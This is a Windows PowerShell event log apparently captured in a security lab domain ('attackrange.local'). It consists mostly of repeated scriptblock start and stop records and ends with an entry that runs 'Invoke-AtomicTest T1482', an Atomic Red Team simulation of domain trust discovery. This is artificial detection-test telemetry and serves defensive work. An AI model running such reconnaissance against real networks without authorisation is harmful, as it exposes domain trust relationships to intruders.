SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478956
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478955
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478954
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478952
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478951
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478950
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478949
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478948
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478947
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478946
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478944
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478943
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478942
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478940
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478938
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478936
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478935
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478934
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478933
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478932
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478931
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478930
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478929
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478928
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478927
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478926
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478925
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478924
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478923
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478922
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478920
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478919
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478918
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478917
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478916
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478914
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478913
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478912
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478911
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478910
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478909
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478908
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478907
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478906
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478905
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478904
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478903
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478902
Keywords=None
Message=Started invocation of ScriptBlock ID: f7a7b70f-f231-4997-8908-762a0f635440
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478901
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1482

